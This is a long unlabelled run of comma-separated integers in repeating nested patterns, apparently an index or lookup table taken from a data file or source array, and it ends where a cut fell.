2667, 2776, 2777, 198, 2547, 5087, 2668, 5096,
5141, 2778, 2875, 2876, 2877, 210, 2548, 5088,
2669, 5097, 5142, 2779, 5105, 5150, 5186, 2878,
2963, 2964, 2965, 2966, 222, 2518, 3040, 2639,
3040, 3041, 2749, 3040, 3041, 3042, 2848, 3040,
3041, 3042, 3043, 2936, 234, 234, 234, 234,
234, 78, 174, 2545, 2666, 186, 2546, 5086,
2667, 2776, 2777, 198, 2547, 5087, 2668, 5096,
5141, 2778, 2875, 2876, 2877, 210, 2548, 5088,
2669, 5097, 5142, 2779, 5105, 5150, 5186, 2878,
2963, 2964, 2965, 2966, 222, 2549, 5089, 2670,
5098, 5143, 2780, 5106, 5151, 5187, 2879, 5113,
5158, 5194, 5222, 2967, 3040, 3041, 3042, 3043,
3044, 234, 2529, 3106, 2650, 3106, 3107, 2760,
3106, 3107, 3108, 2859, 3106, 3107, 3108, 3109,
2947, 3106, 3107, 3108, 3109, 3110, 3024, 246,
246, 246, 246, 246, 246, 90, 174, 2545,
2666, 186, 2546, 5086, 2667, 2776, 2777, 198,
2547, 5087, 2668, 5096, 5141, 2778, 2875, 2876,
2877, 210, 2548, 5088, 2669, 5097, 5142, 2779,
5105, 5150, 5186, 2878, 2963, 2964, 2965, 2966,
222, 2549, 5089, 2670, 5098, 5143, 2780, 5106,
5151, 5187, 2879, 5113, 5158, 5194, 5222, 2967,
3040, 3041, 3042, 3043, 3044, 234, 2550, 5090,
2671, 5099, 5144, 2781, 5107, 5152, 5188, 2880,
5114, 5159, 5195, 5223, 2968, 5120, 5165, 5201,
5229, 1604, 3045, 3106, 3107, 3108, 3109, 3110,
3111, 246, 2540, 3161, 2661, 3161, 3162, 2771,
3161, 3162, 3163, 2870, 3161, 3162, 3163, 3164,
2958, 3161, 3162, 3163, 3164, 3165, 3035, 3161,
3162, 3163, 3164, 3165, 3166, 3101, 258, 258,
258, 258, 258, 258, 258, 102, 174, 263,
264, 186, 263, 2138, 264, 265, 265, 198,
263, 2138, 264, 2139, 2149, 265, 266, 266,
266, 210, 263, 2138, 264, 2139, 2149, 265,
2140, 2150, 2159, 266, 267, 267, 267, 267,
222, 263, 2138, 264, 2139, 2149, 265, 2140,
2150, 2159, 266, 2141, 2151, 2160, 2168, 267,
268, 268, 268, 268, 268, 234, 263, 2138,
264, 2139, 2149, 265, 2140, 2150, 2159, 266,
2141, 2151, 2160, 2168, 267, 2142, 2152, 2161,
2169, 2176, 268, 269, 269, 269, 269, 269,
269, 246, 263, 2138, 264, 2139, 2149, 265,
2140, 2150, 2159, 266, 2141, 2151, 2160, 2168,
267, 2142, 2152, 2161, 2169, 2176, 268, 2143,
2153, 2162, 2170, 2177, 2183, 269, 270, 270,
270, 270, 270, 270, 270, 258, 107, 107,
108, 107, 108, 109, 107, 108, 109, 110,
107, 108, 109, 110, 111, 107, 108, 109,
110, 111, 112, 107, 108, 109, 110, 111,
112, 113, 107, 108, 109, 110, 111, 112,
113, 114, 11, 167, 179, 23, 12, 1610,
2468, 1676, 24, 168, 2479, 2600, 180, 191,
1742, 192, 35, 36, 13, 1611, 2469, 1677,
25, 1621, 3326, 3546, 1687, 2480, 3766, 2601,
1743, 1753, 37, 169, 2490, 2611, 181, 2491,
3986, 2612, 2721, 2722, 193, 203, 1808, 204,
1809, 1819, 205, 47, 48, 49, 14, 1612,
2470, 1678, 26, 1622, 3327, 3547, 1688, 2481,
3767, 2602, 1744, 1754, 38, 1631, 3336, 3556,
1697, 3381, 1600, 3601, 3776, 3821, 1763, 2492,
3987, 2613, 3996, 4041, 2723, 1810, 1820, 1829,
50, 170, 2501, 2622, 182, 2502, 4206, 2623,
2732, 2733, 194, 2503, 4207, 2624, 4216, 4261,
2734, 2831, 2832, 2833, 206, 215, 1874, 216,
1875, 1885, 217, 1876, 1886, 1895, 218, 59,
60, 61, 62, 15, 1613, 2471, 1679, 27,
1623, 3328, 3548, 1689, 2482, 3768, 2603, 1745,
1755, 39, 1632, 3337, 3557, 1698, 3382, 6186,
3602, 3777, 3822, 1764, 2493, 3988, 2614, 3997,
4042, 2724, 1811, 1821, 1830, 51, 1640, 3345,
3565, 1706, 3390, 6194, 3610, 3785, 3830, 1772,
3426, 6230, 3646, 6350, 1601, 3866, 4005, 4050,
4086, 1838, 2504, 4208, 2625, 4217, 4262, 2735,
4225, 4270, 4306, 2834, 1877, 1887, 1896, 1904,
63, 171, 2512, 2633, 183, 2513, 4426, 2634,
2743, 2744, 195, 2514, 4427, 2635, 4436, 4481,
2745, 2842, 2843, 2844, 207, 2515, 4428, 2636,
4437, 4482, 2746, 4445, 4490, 4526, 2845, 2930,
2931, 2932, 2933, 219, 227, 1940, 228, 1941,
1951, 229, 1942, 1952, 1961, 230, 1943, 1953,
1962, 1970, 231, 71, 72, 73, 74, 75,
16, 1614, 2472, 1680, 28, 1624, 3329, 3549,
1690, 2483, 3769, 2604, 1746, 1756, 40, 1633,
3338, 3558, 1699, 3383, 6187, 3603, 3778, 3823,
1765, 2494, 3989, 2615, 3998, 4043, 2725, 1812,
1822, 1831, 52, 1641, 3346, 3566, 1707, 3391,
6195, 3611, 3786, 3831, 1773, 3427, 6231, 3647,
6351, 6679, 3867, 4006, 4051, 4087, 1839, 2505,
4209, 2626, 4218, 4263, 2736, 4226, 4271, 4307,
2835, 1878, 1888, 1897, 1905, 64, 1648, 3353,
3573, 1714, 3398, 6202, 3618, 3793, 3838, 1780,
3434, 6238, 3654, 6358, 6686, 3874, 4013, 4058,
4094, 1846, 3462, 6266, 3682, 6386, 6714, 3902,
6470, 6798, 1602, 4122, 4233, 4278, 4314, 4342,
1912, 2516, 4429, 2637, 4438, 4483, 2747, 4446,
4491, 4527, 2846, 4453, 4498, 4534, 4562, 2934,
1944, 1954, 1963, 1971, 1978, 76, 172, 2523,
2644, 184, 2524, 4646, 2645, 2754, 2755, 196,
2525, 4647, 2646, 4656, 4701, 2756, 2853, 2854,
2855, 208, 2526, 4648, 2647, 4657, 4702, 2757,
4665, 4710, 4746, 2856, 2941, 2942, 2943, 2944,
220, 2527, 4649, 2648, 4658, 4703, 2758, 4666,
4711, 4747, 2857, 4673, 4718, 4754, 4782, 2945,
3018, 3019, 3020, 3021, 3022, 232, 239, 2006,
240, 2007, 2017, 241, 2008, 2018, 2027, 242,
2009, 2019, 2028, 2036, 243, 2010, 2020, 2029,
2037, 2044, 244, 83, 84, 85, 86, 87,
88, 17, 1615, 2473, 1681, 29, 1625, 3330,
3550, 1691, 2484, 3770, 2605, 1747, 1757, 41,
1634, 3339, 3559, 1700, 3384, 6188, 3604, 3779,
3824, 1766, 2495, 3990, 2616, 3999, 4044, 2726,
1813, 1823, 1832, 53, 1642, 3347, 3567, 1708,
3392, 6196, 3612, 3787, 3832, 1774, 3428, 6232,
3648, 6352, 6680, 3868, 4007, 4052, 4088, 1840,
2506, 4210, 2627, 4219, 4264, 2737, 4227, 4272,
4308, 2836, 1879, 1889, 1898, 1906, 65, 1649,
3354, 3574, 1715, 3399, 6203, 3619, 3794, 3839,
1781, 3435, 6239, 3655, 6359, 6687, 3875, 4014,
4059, 4095, 1847, 3463, 6267, 3683, 6387, 6715,
3903, 6471, 6799, 7008, 4123, 4234, 4279, 4315,
4343, 1913, 2517, 4430, 2638, 4439, 4484, 2748,
4447, 4492, 4528, 2847, 4454, 4499, 4535, 4563,
2935, 1945, 1955, 1964, 1972, 1979, 77, 1655,
3360, 3580, 1721, 3405, 6209, 3625, 3800, 3845,
1787, 3441, 6245, 3661, 6365, 6693, 3881, 4020,
4065, 4101, 1853, 3469, 6273, 3689, 6393, 6721,
3909, 6477, 6805, 7014, 4129, 4240, 4285, 4321,
4349, 1919, 3490, 6294, 3710, 6414, 6742, 3930,
6498, 6826, 7035, 4150, 6554, 6882, 7091, 1603,
4370, 4460, 4505, 4541, 4569, 4590, 1985, 2528,
4650, 2649, 4659, 4704, 2759, 4667, 4712, 4748,
2858, 4674, 4719, 4755, 4783, 2946, 4680, 4725,
4761, 4789, 4810, 3023, 2011, 2021, 2030, 2038,
2045, 2051, 89, 173, 2534, 2655, 185, 2535,
4866, 2656, 2765, 2766, 197, 2536, 4867, 2657,
4876, 4921, 2767, 2864, 2865, 2866, 209, 2537,
4868, 2658, 4877, 4922, 2768, 4885, 4930, 4966,
2867, 2952, 2953, 2954, 2955, 221, 2538, 4869,
2659, 4878, 4923, 2769, 4886, 4931, 4967, 2868,
4893, 4938, 4974, 5002, 2956, 3029, 3030, 3031,
3032, 3033, 233, 2539, 4870, 2660, 4879, 4924,
2770, 4887, 4932, 4968, 2869, 4894, 4939, 4975,
5003, 2957, 4900, 4945, 4981, 5009, 5030, 3034,
3095, 3096, 3097, 3098, 3099, 3100, 245, 251,
2072, 252, 2073, 2083, 253, 2074, 2084, 2093,
254, 2075, 2085, 2094, 2102, 255, 2076, 2086,
2095, 2103, 2110, 256, 2077, 2087, 2096, 2104,
2111, 2117, 257, 95, 96, 97, 98, 99,
100, 101, 18, 1616, 2474, 1682, 30, 1626,
3331, 3551, 1692, 2485, 3771, 2606, 1748, 1758,
42, 1635, 3340, 3560, 1701, 3385, 6189, 3605,
3780, 3825, 1767, 2496, 3991, 2617, 4000, 4045,
2727, 1814, 1824, 1833, 54, 1643, 3348, 3568,
1709, 3393, 6197, 3613, 3788, 3833, 1775, 3429,
6233, 3649, 6353, 6681, 3869, 4008, 4053, 4089,
1841, 2507, 4211, 2628, 4220, 4265, 2738, 4228,
4273, 4309, 2837, 1880, 1890, 1899, 1907, 66,
1650, 3355, 3575, 1716, 3400, 6204, 3620, 3795,
3840, 1782, 3436, 6240, 3656, 6360, 6688, 3876,
4015, 4060, 4096, 1848, 3464, 6268, 3684, 6388,
6716, 3904, 6472, 6800, 7009, 4124, 4235, 4280,
4316, 4344, 1914, 2518, 4431, 2639, 4440, 4485,
2749, 4448, 4493, 4529, 2848, 4455, 4500, 4536,
4564, 2936, 1946, 1956, 1965, 1973, 1980, 78,
1656, 3361, 3581, 1722, 3406, 6210, 3626, 3801,
3846, 1788, 3442, 6246, 3662, 6366, 6694, 3882,
4021, 4066, 4102, 1854, 3470, 6274, 3690, 6394,
6722, 3910, 6478, 6806, 7015, 4130, 4241, 4286,
4322, 4350, 1920, 3491, 6295, 3711, 6415, 6743,
3931, 6499, 6827, 7036, 4151, 6555, 6883, 7092,
7217, 4371, 4461, 4506, 4542, 4570, 4591, 1986,
2529, 4651, 2650, 4660, 4705, 2760, 4668, 4713,
4749, 2859, 4675, 4720, 4756, 4784, 2947, 4681,
4726, 4762, 4790, 4811, 3024, 2012, 2022, 2031,
2039, 2046, 2052, 90, 1661, 3366, 3586, 1727,
3411, 6215, 3631, 3806, 3851, 1793, 3447, 6251,
3667, 6371, 6699, 3887, 4026, 4071, 4107, 1859,
3475, 6279, 3695, 6399, 6727, 3915, 6483, 6811,
7020, 4135, 4246, 4291, 4327, 4355, 1925, 3496,
6300, 3716, 6420, 6748, 3936, 6504, 6832, 7041,
4156, 6560, 6888, 7097, 7222, 4376, 4466, 4511,
4547, 4575, 4596, 1991, 3511, 6315, 3731, 6435,
6763, 3951, 6519, 6847, 7056, 4171, 6575, 6903,
7112, 7237, 4391, 1605, 1605, 1605, 1605, 1604,
1605, 4686, 4731, 4767, 4795, 4816, 1605, 2057,
2540, 4871, 2661, 4880, 4925, 2771, 4888, 4933,
4969, 2870, 4895, 4940, 4976, 5004, 2958, 4901,
4946, 4982, 5010, 5031, 3035, 4906, 4951, 4987,
5015, 5036, 1605, 3101, 2078, 2088, 2097, 2105,
2112, 2118, 2123, 102, 174, 2545, 2666, 186,
2546, 5086, 2667, 2776, 2777, 198, 2547, 5087,
2668, 5096, 5141, 2778, 2875, 2876, 2877, 210,
2548, 5088, 2669, 5097, 5142, 2779, 5105, 5150,
5186, 2878, 2963, 2964, 2965, 2966, 222, 2549,
5089, 2670, 5098, 5143, 2780, 5106, 5151, 5187,
2879, 5113, 5158, 5194, 5222, 2967, 3040, 3041,
3042, 3043, 3044, 234, 2550, 5090, 2671, 5099,
5144, 2781, 5107, 5152, 5188, 2880, 5114, 5159,
5195, 5223, 2968, 5120, 5165, 5201, 5229, 5250,
3045, 3106, 3107, 3108, 3109, 3110, 3111, 246,
2551, 5091, 2672, 5100, 5145, 2782, 5108, 5153,
5189, 2881, 5115, 5160, 5196, 5224, 2969, 5121,
5166, 5202, 5230, 5251, 3046, 5126, 5171, 5207,
5235, 5256, 1605, 3112, 3161, 3162, 3163, 3164,
3165, 3166, 3167, 258, 263, 2138, 264, 2139,
2149, 265, 2140, 2150, 2159, 266, 2141, 2151,
2160, 2168, 267, 2142, 2152, 2161, 2169, 2176,
268, 2143, 2153, 2162, 2170, 2177, 2183, 269,
2144, 2154, 2163, 2171, 2178, 2184, 2189, 270,
107, 108, 109, 110, 111, 112, 113, 114,
19, 175, 2475, 187, 31, 175, 2556, 2677,
187, 2486, 2787, 2607, 199, 199, 43, 175,
2556, 2677, 187, 2557, 5306, 2678, 2787, 2788,
199, 2497, 2886, 2618, 2886, 2887, 2728, 211,
211, 211, 55, 175, 2556, 2677, 187, 2557,
5306, 2678, 2787, 2788, 199, 2558, 5307, 2679,
5316, 5361, 2789, 2886, 2887, 2888, 211, 2508,
2974, 2629, 2974, 2975, 2739, 2974, 2975, 2976,
2838, 223, 223, 223, 223, 67, 175, 2556,
2677, 187, 2557, 5306, 2678, 2787, 2788, 199,
2558, 5307, 2679, 5316, 5361, 2789, 2886, 2887,
2888, 211, 2559, 5308, 2680, 5317, 5362, 2790,
5325, 5370, 5406, 2889, 2974, 2975, 2976, 2977,
223, 2519, 3051, 2640, 3051, 3052, 2750, 3051,
3052, 3053, 2849, 3051, 3052, 3053, 3054, 2937,
235, 235, 235, 235, 235, 79, 175, 2556,
2677, 187, 2557, 5306, 2678, 2787, 2788, 199,
2558, 5307, 2679, 5316, 5361, 2789, 2886, 2887,
2888, 211, 2559, 5308, 2680, 5317, 5362, 2790,
5325, 5370, 5406, 2889, 2974, 2975, 2976, 2977,
223, 2560, 5309, 2681, 5318, 5363, 2791, 5326,
5371, 5407, 2890, 5333, 5378, 5414, 5442, 2978,
3051, 3052, 3053, 3054, 3055, 235, 2530, 3117,
2651, 3117, 3118, 2761, 3117, 3118, 3119, 2860,
3117, 3118, 3119, 3120, 2948, 3117, 3118, 3119,
3120, 3121, 3025, 247, 247, 247, 247, 247,
247, 91, 175, 2556, 2677, 187, 2557, 5306,
2678, 2787, 2788, 199, 2558, 5307, 2679, 5316,
5361, 2789, 2886, 2887, 2888, 211, 2559, 5308,
2680, 5317, 5362, 2790, 5325, 5370, 5406, 2889,
2974, 2975, 2976, 2977, 223, 2560, 5309, 2681,
5318, 5363, 2791, 5326, 5371, 5407, 2890, 5333,
5378, 5414, 5442, 2978, 3051, 3052, 3053, 3054,
3055, 235, 2561, 5310, 2682, 5319, 5364, 2792,
5327, 5372, 5408, 2891, 5334, 5379, 5415, 5443,
2979, 5340, 5385, 5421, 5449, 5470, 3056, 3117,
3118, 3119, 3120, 3121, 3122, 247, 2541, 3172,
2662, 3172, 3173, 2772, 3172, 3173, 3174, 2871,
3172, 3173, 3174, 3175, 2959, 3172, 3173, 3174,
3175, 3176, 3036, 3172, 3173, 3174, 3175, 3176,
3177, 3102, 259, 259, 259, 259, 259, 259,
259, 103, 175, 2556, 2677, 187, 2557, 5306,
2678, 2787, 2788, 199, 2558, 5307, 2679, 5316,
5361, 2789, 2886, 2887, 2888, 211, 2559, 5308,
2680, 5317, 5362, 2790, 5325, 5370, 5406, 2889,
2974, 2975, 2976, 2977, 223, 2560, 5309, 2681,
5318, 5363, 2791, 5326, 5371, 5407, 2890, 5333,
5378, 5414, 5442, 2978, 3051, 3052, 3053, 3054,
3055, 235, 2561, 5310, 2682, 5319, 5364, 2792,
5327, 5372, 5408, 2891, 5334, 5379, 5415, 5443,
2979, 5340, 5385, 5421, 5449, 5470, 3056, 3117,
3118, 3119, 3120, 3121, 3122, 247, 2562, 5311,
2683, 5320, 5365, 2793, 5328, 5373, 5409, 2892,
5335, 5380, 5416, 5444, 2980, 5341, 5386, 5422,
5450, 5471, 3057, 5346, 5391, 5427, 5455, 5476,
1605, 3123, 3172, 3173, 3174, 3175, 3176, 3177,
3178, 259, 2552, 3216, 2673, 3216, 3217, 2783,
3216, 3217, 3218, 2882, 3216, 3217, 3218, 3219,
2970, 3216, 3217, 3218, 3219, 3220, 3047, 3216,
3217, 3218, 3219, 3220, 3221, 3113, 3216, 3217,
3218, 3219, 3220, 3221, 3222, 3168, 271, 271,
271, 271, 271, 271, 271, 271, 115, 175,
275, 276, 187, 275, 2204, 276, 277, 277,
199, 275, 2204, 276, 2205, 2215, 277, 278,
278, 278, 211, 275, 2204, 276, 2205, 2215,
277, 2206, 2216, 2225, 278, 279, 279, 279,
279, 223, 275, 2204, 276, 2205, 2215, 277,
2206, 2216, 2225, 278, 2207, 2217, 2226, 2234,
279, 280, 280, 280, 280, 280, 235, 275,
2204, 276, 2205, 2215, 277, 2206, 2216, 2225,
278, 2207, 2217, 2226, 2234, 279, 2208, 2218,
2227, 2235, 2242, 280, 281, 281, 281, 281,
281, 281, 247, 275, 2204, 276, 2205, 2215,
277, 2206, 2216, 2225, 278, 2207, 2217, 2226,
2234, 279, 2208, 2218, 2227, 2235, 2242, 280,
2209, 2219, 2228, 2236, 2243, 2249, 281, 282,
282, 282, 282, 282, 282, 282, 259, 275,
2204, 276, 2205, 2215, 277, 2206, 2216, 2225,
278, 2207, 2217, 2226, 2234, 279, 2208, 2218,
2227, 2235, 2242, 280, 2209, 2219, 2228, 2236,
2243, 2249, 281, 2210, 2220, 2229, 2237, 2244,
2250, 2255, 282, 283, 283, 283, 283, 283,
283, 283, 283, 271, 119, 119, 120, 119,
120, 121, 119, 120, 121, 122, 119, 120,
121, 122, 123, 119, 120, 121, 122, 123,
124, 119, 120, 121, 122, 123, 124, 125,
119, 120, 121, 122, 123, 124, 125, 126,
119, 120, 121, 122, 123, 124, 125, 126,
127, 11, 167, 179, 23, 12, 1610, 2468,
1676, 24, 168, 2479, 2600, 180, 191, 1742,
192, 35, 36, 13, 1611, 2469, 1677, 25,
1621, 3326, 3546, 1687, 2480, 3766, 2601, 1743,
1753, 37, 169, 2490, 2611, 181, 2491, 3986,
2612, 2721, 2722, 193, 203, 1808, 204, 1809,
1819, 205, 47, 48, 49, 14, 1612, 2470,
1678, 26, 1622, 3327, 3547, 1688, 2481, 3767,
2602, 1744, 1754, 38, 1631, 3336, 3556, 1697,
3381, 1600, 3601, 3776, 3821, 1763, 2492, 3987,
2613, 3996, 4041, 2723, 1810, 1820, 1829, 50,
170, 2501, 2622, 182, 2502, 4206, 2623, 2732,
2733, 194, 2503, 4207, 2624, 4216, 4261, 2734,
2831, 2832, 2833, 206, 215, 1874, 216, 1875,
1885, 217, 1876, 1886, 1895, 218, 59, 60,
61, 62, 15, 1613, 2471, 1679, 27, 1623,
3328, 3548, 1689, 2482, 3768, 2603, 1745, 1755,
39, 1632, 3337, 3557, 1698, 3382, 6186, 3602,
3777, 3822, 1764, 2493, 3988, 2614, 3997, 4042,
2724, 1811, 1821, 1830, 51, 1640, 3345, 3565,
1706, 3390, 6194, 3610, 3785, 3830, 1772, 3426,
6230, 3646, 6350, 1601, 3866, 4005, 4050, 4086,
1838, 2504, 4208, 2625, 4217, 4262, 2735, 4225,
4270, 4306, 2834, 1877, 1887, 1896, 1904, 63,
171, 2512, 2633, 183, 2513, 4426, 2634, 2743,
2744, 195, 2514, 4427, 2635, 4436, 4481, 2745,
2842, 2843, 2844, 207, 2515, 4428, 2636, 4437,
4482, 2746, 4445, 4490, 4526, 2845, 2930, 2931,
2932, 2933, 219, 227, 1940, 228, 1941, 1951,
229, 1942, 1952, 1961, 230, 1943, 1953, 1962,
1970, 231, 71, 72, 73, 74, 75, 16,
1614, 2472, 1680, 28, 1624, 3329, 3549, 1690,
2483, 3769, 2604, 1746, 1756, 40, 1633, 3338,
3558, 1699, 3383, 6187, 3603, 3778, 3823, 1765,
2494, 3989, 2615, 3998, 4043, 2725, 1812, 1822,
1831, 52, 1641, 3346, 3566, 1707, 3391, 6195,
3611, 3786, 3831, 1773, 3427, 6231, 3647, 6351,
6679, 3867, 4006, 4051, 4087, 1839, 2505, 4209,
2626, 4218, 4263, 2736, 4226, 4271, 4307, 2835,
1878, 1888, 1897, 1905, 64, 1648, 3353, 3573,
1714, 3398, 6202, 3618, 3793, 3838, 1780, 3434,
6238, 3654, 6358, 6686, 3874, 4013, 4058, 4094,
1846, 3462, 6266, 3682, 6386, 6714, 3902, 6470,
6798, 1602, 4122, 4233, 4278, 4314, 4342, 1912,
2516, 4429, 2637, 4438, 4483, 2747, 4446, 4491,
4527, 2846, 4453, 4498, 4534, 4562, 2934, 1944,
1954, 1963, 1971, 1978, 76, 172, 2523, 2644,
184, 2524, 4646, 2645, 2754, 2755, 196, 2525,
4647, 2646, 4656, 4701, 2756, 2853, 2854, 2855,
208, 2526, 4648, 2647, 4657, 4702, 2757, 4665,
4710, 4746, 2856, 2941, 2942, 2943, 2944, 220,
2527, 4649, 2648, 4658, 4703, 2758, 4666, 4711,
4747, 2857, 4673, 4718, 4754, 4782, 2945, 3018,
3019, 3020, 3021, 3022, 232, 239, 2006, 240,
2007, 2017, 241, 2008, 2018, 2027, 242, 2009,
2019, 2028, 2036, 243, 2010, 2020, 2029, 2037,
2044, 244, 83, 84, 85, 86, 87, 88,
17, 1615, 2473, 1681, 29, 1625, 3330, 3550,
1691, 2484, 3770, 2605, 1747, 1757, 41, 1634,
3339, 3559, 1700, 3384, 6188, 3604, 3779, 3824,
1766, 2495, 3990, 2616, 3999, 4044, 2726, 1813,
1823, 1832, 53, 1642, 3347, 3567, 1708, 3392,
6196, 3612, 3787, 3832, 1774, 3428, 6232, 3648,
6352, 6680, 3868, 4007, 4052, 4088, 1840, 2506,
4210, 2627, 4219, 4264, 2737, 4227, 4272, 4308,
2836, 1879, 1889, 1898, 1906, 65, 1649, 3354,
3574, 1715, 3399, 6203, 3619, 3794, 3839, 1781,
3435, 6239, 3655, 6359, 6687, 3875, 4014, 4059,
4095, 1847, 3463, 6267, 3683, 6387, 6715, 3903,
6471, 6799, 7008, 4123, 4234, 4279, 4315, 4343,
1913, 2517, 4430, 2638, 4439, 4484, 2748, 4447,
4492, 4528, 2847, 4454, 4499, 4535, 4563, 2935,
1945, 1955, 1964, 1972, 1979, 77, 1655, 3360,
3580, 1721, 3405, 6209, 3625, 3800, 3845, 1787,
3441, 6245, 3661, 6365, 6693, 3881, 4020, 4065,
4101, 1853, 3469, 6273, 3689, 6393, 6721, 3909,
6477, 6805, 7014, 4129, 4240, 4285, 4321, 4349,
1919, 3490, 6294, 3710, 6414, 6742, 3930, 6498,
6826, 7035, 4150, 6554, 6882, 7091, 1603, 4370,
4460, 4505, 4541, 4569, 4590, 1985, 2528, 4650,
2649, 4659, 4704, 2759, 4667, 4712, 4748, 2858,
4674, 4719, 4755, 4783, 2946, 4680, 4725, 4761,
4789, 4810, 3023, 2011, 2021, 2030, 2038, 2045,
2051, 89, 173, 2534, 2655, 185, 2535, 4866,
2656, 2765, 2766, 197, 2536, 4867, 2657, 4876,
4921, 2767, 2864, 2865, 2866, 209, 2537, 4868,
2658, 4877, 4922, 2768, 4885, 4930, 4966, 2867,
2952, 2953, 2954, 2955, 221, 2538, 4869, 2659,
4878, 4923, 2769, 4886, 4931, 4967, 2868, 4893,
4938, 4974, 5002, 2956, 3029, 3030, 3031, 3032,
3033, 233, 2539, 4870, 2660, 4879, 4924, 2770,
4887, 4932, 4968, 2869, 4894, 4939, 4975, 5003,
2957, 4900, 4945, 4981, 5009, 5030, 3034, 3095,
3096, 3097, 3098, 3099, 3100, 245, 251, 2072,
252, 2073, 2083, 253, 2074, 2084, 2093, 254,
2075, 2085, 2094, 2102, 255, 2076, 2086, 2095,
2103, 2110, 256, 2077, 2087, 2096, 2104, 2111,
2117, 257, 95, 96, 97, 98, 99, 100,
101, 18, 1616, 2474, 1682, 30, 1626, 3331,
3551, 1692, 2485, 3771, 2606, 1748, 1758, 42,
1635, 3340, 3560, 1701, 3385, 6189, 3605, 3780,
3825, 1767, 2496, 3991, 2617, 4000, 4045, 2727,
1814, 1824, 1833, 54, 1643, 3348, 3568, 1709,
3393, 6197, 3613, 3788, 3833, 1775, 3429, 6233,
3649, 6353, 6681, 3869, 4008, 4053, 4089, 1841,
2507, 4211, 2628, 4220, 4265, 2738, 4228, 4273,
4309, 2837, 1880, 1890, 1899, 1907, 66, 1650,
3355, 3575, 1716, 3400, 6204, 3620, 3795, 3840,
1782, 3436, 6240, 3656, 6360, 6688, 3876, 4015,
4060, 4096, 1848, 3464, 6268, 3684, 6388, 6716,
3904, 6472, 6800, 7009, 4124, 4235, 4280, 4316,
4344, 1914, 2518, 4431, 2639, 4440, 4485, 2749,
4448, 4493, 4529, 2848, 4455, 4500, 4536, 4564,
2936, 1946, 1956, 1965, 1973, 1980, 78, 1656,
3361, 3581, 1722, 3406, 6210, 3626, 3801, 3846,
1788, 3442, 6246, 3662, 6366, 6694, 3882, 4021,
4066, 4102, 1854, 3470, 6274, 3690, 6394, 6722,
3910, 6478, 6806, 7015, 4130, 4241, 4286, 4322,
4350, 1920, 3491, 6295, 3711, 6415, 6743, 3931,
6499, 6827, 7036, 4151, 6555, 6883, 7092, 7217,
4371, 4461, 4506, 4542, 4570, 4591, 1986, 2529,
4651, 2650, 4660, 4705, 2760, 4668, 4713, 4749,
2859, 4675, 4720, 4756, 4784, 2947, 4681, 4726,
4762, 4790, 4811, 3024, 2012, 2022, 2031, 2039,
2046, 2052, 90, 1661, 3366, 3586, 1727, 3411,
6215, 3631, 3806, 3851, 1793, 3447, 6251, 3667,
6371, 6699, 3887, 4026, 4071, 4107, 1859, 3475,
6279, 3695, 6399, 6727, 3915, 6483, 6811, 7020,
4135, 4246, 4291, 4327, 4355, 1925, 3496, 6300,
3716, 6420, 6748, 3936, 6504, 6832, 7041, 4156,
6560, 6888, 7097, 7222, 4376, 4466, 4511, 4547,
4575, 4596, 1991, 3511, 6315, 3731, 6435, 6763,
3951, 6519, 6847, 7056, 4171, 6575, 6903, 7112,
7237, 4391, 6610, 6938, 7147, 7272, 1604, 4611,
4686, 4731, 4767, 4795, 4816, 4831, 2057, 2540,
4871, 2661, 4880, 4925, 2771, 4888, 4933, 4969,
2870, 4895, 4940, 4976, 5004, 2958, 4901, 4946,
4982, 5010, 5031, 3035, 4906, 4951, 4987, 5015,
5036, 5051, 3101, 2078, 2088, 2097, 2105, 2112,
2118, 2123, 102, 174, 2545, 2666, 186, 2546,
5086, 2667, 2776, 2777, 198, 2547, 5087, 2668,
5096, 5141, 2778, 2875, 2876, 2877, 210, 2548,
5088, 2669, 5097, 5142, 2779, 5105, 5150, 5186,
2878, 2963, 2964, 2965, 2966, 222, 2549, 5089,
2670, 5098, 5143, 2780, 5106, 5151, 5187, 2879,
5113, 5158, 5194, 5222, 2967, 3040, 3041, 3042,
3043, 3044, 234, 2550, 5090, 2671, 5099, 5144,
2781, 5107, 5152, 5188, 2880, 5114, 5159, 5195,
5223, 2968, 5120, 5165, 5201, 5229, 5250, 3045,
3106, 3107, 3108, 3109, 3110, 3111, 246, 2551,
5091, 2672, 5100, 5145, 2782, 5108, 5153, 5189,
2881, 5115, 5160, 5196, 5224, 2969, 5121, 5166,
5202, 5230, 5251, 3046, 5126, 5171, 5207, 5235,
5256, 5271, 3112, 3161, 3162, 3163, 3164, 3165,
3166, 3167, 258, 263, 2138, 264, 2139, 2149,
265, 2140, 2150, 2159, 266, 2141, 2151, 2160,
2168, 267, 2142, 2152, 2161, 2169, 2176, 268,
2143, 2153, 2162, 2170, 2177, 2183, 269, 2144,
2154, 2163, 2171, 2178, 2184, 2189, 270, 107,
108, 109, 110, 111, 112, 113, 114, 19,
1617, 2475, 1683, 31, 1627, 3332, 3552, 1693,
2486, 3772, 2607, 1749, 1759, 43, 1636, 3341,
3561, 1702, 3386, 6190, 3606, 3781, 3826, 1768,
2497, 3992, 2618, 4001, 4046, 2728, 1815, 1825,
1834, 55, 1644, 3349, 3569, 1710, 3394, 6198,
3614, 3789, 3834, 1776, 3430, 6234, 3650, 6354,
6682, 3870, 4009, 4054, 4090, 1842, 2508, 4212,
2629, 4221, 4266, 2739, 4229, 4274, 4310, 2838,
1881, 1891, 1900, 1908, 67, 1651, 3356, 3576,
1717, 3401, 6205, 3621, 3796, 3841, 1783, 3437,
6241, 3657, 6361, 6689, 3877, 4016, 4061, 4097,
1849, 3465, 6269, 3685, 6389, 6717, 3905, 6473,
6801, 7010, 4125, 4236, 4281, 4317, 4345, 1915,
2519, 4432, 2640, 4441, 4486, 2750, 4449, 4494,
4530, 2849, 4456, 4501, 4537, 4565, 2937, 1947,
1957, 1966, 1974, 1981, 79, 1657, 3362, 3582,
1723, 3407, 6211, 3627, 3802, 3847, 1789, 3443,
6247, 3663, 6367, 6695, 3883, 4022, 4067, 4103,
1855, 3471, 6275, 3691, 6395, 6723, 3911, 6479,
6807, 7016, 4131, 4242, 4287, 4323, 4351, 1921,
3492, 6296, 3712, 6416, 6744, 3932, 6500, 6828,
7037, 4152, 6556, 6884, 7093, 7218, 4372, 4462,
4507, 4543, 4571, 4592, 1987, 2530, 4652, 2651,
4661, 4706, 2761, 4669, 4714, 4750, 2860, 4676,
4721, 4757, 4785, 2948, 4682, 4727, 4763, 4791,
4812, 3025, 2013, 2023, 2032, 2040, 2047, 2053,
91, 1662, 3367, 3587, 1728, 3412, 6216, 3632,
3807, 3852, 1794, 3448, 6252, 3668, 6372, 6700,
3888, 4027, 4072, 4108, 1860, 3476, 6280, 3696,
